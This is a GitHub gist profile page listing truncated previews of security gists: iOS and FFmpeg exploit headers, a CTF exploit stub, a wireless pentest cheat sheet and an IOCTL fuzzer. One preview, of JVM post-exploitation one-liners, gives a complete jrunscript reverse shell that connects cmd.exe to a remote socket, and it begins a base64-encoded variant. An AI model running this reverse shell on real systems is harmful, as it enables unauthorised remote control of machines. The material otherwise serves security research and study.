Skip to content

Instantly share code, notes, and snippets.

View R3zk0n's full-sized avatar
🚩

Luke Symons R3zk0n

🚩
88 followers · 368 following
View GitHub Profile
@Siguza
Siguza / phoenix.c
Last active March 7, 2026 23:37
Phœnix exploit / iOS 9.3.5
// Bugs by NSO Group / Ian Beer.
// Exploit by Siguza & tihmstar.
// Thanks also to Max Bazaliy.
#include <stdint.h> // uint32_t, uint64_t
#include <stdio.h> // fprintf, stderr
#include <string.h> // memcpy, memset, strncmp
#include <unistd.h> // getpid
#include <mach/mach.h>
#include <stdlib.h>
@hub2
hub2 / exploit.py
Created January 4, 2019 18:57
Flaglab Real World CTF
#!/usr/bin/env python3
import requests
import sys
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import random
import logging
import time
@curi0usJack
curi0usJack / twitterfavlinks.py
Last active May 3, 2020 07:58
@PaulCher
PaulCher / ffmpeg_rtmp_exploit.py
Created November 16, 2016 12:41
#!/usr/bin/python
import os
import socket
import struct
from time import sleep
from pwn import *
bind_ip = '0.0.0.0'
@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created July 2, 2016 18:30
Wireless Penetration Testing Cheat Sheet

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active December 13, 2023 15:02
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@debasishm89
debasishm89 / inmemory-ioctl-fuzzer-logger.py
Last active October 30, 2022 16:25
A mutation based usermode dumb IOCTL Fuzzer/Logger. This Python script hooks DeviceIoControl!Kernel32 and try to dump all I/O Control code I/O Buffer pointer, I/O buffer length. It has also the ability to fuzz I/O buffer size,content with junk.
'''
Author : Debasish Mandal
Blog :http://www.debasish.in/
Twitter : https://twitter.com/debasishm89
A mutation based user mode (ring3) dumb in-memory IOCTL Fuzzer/Logger.
This script attach it self to any given process and hooks DeviceIoControl!Kernel32 API and
try to log or fuzz all I/O Control code I/O Buffer pointer, I/O buffer length that
process sends to any Kernel driver.
@sriranggd
sriranggd / git_index_file_reader.rb
Created August 14, 2011 10:27
Ruby script to read a git index file and write the contents in human readable form
#!/usr/bin/env ruby
# ************************************************************************
# A simple ruby script to read the index file of any git repository
# and dump its contents to a file in a readable format.
#
# This is totally a study tool, written when I was trying to understand
# the git internals.
#
# The file strucutre specification considered is this :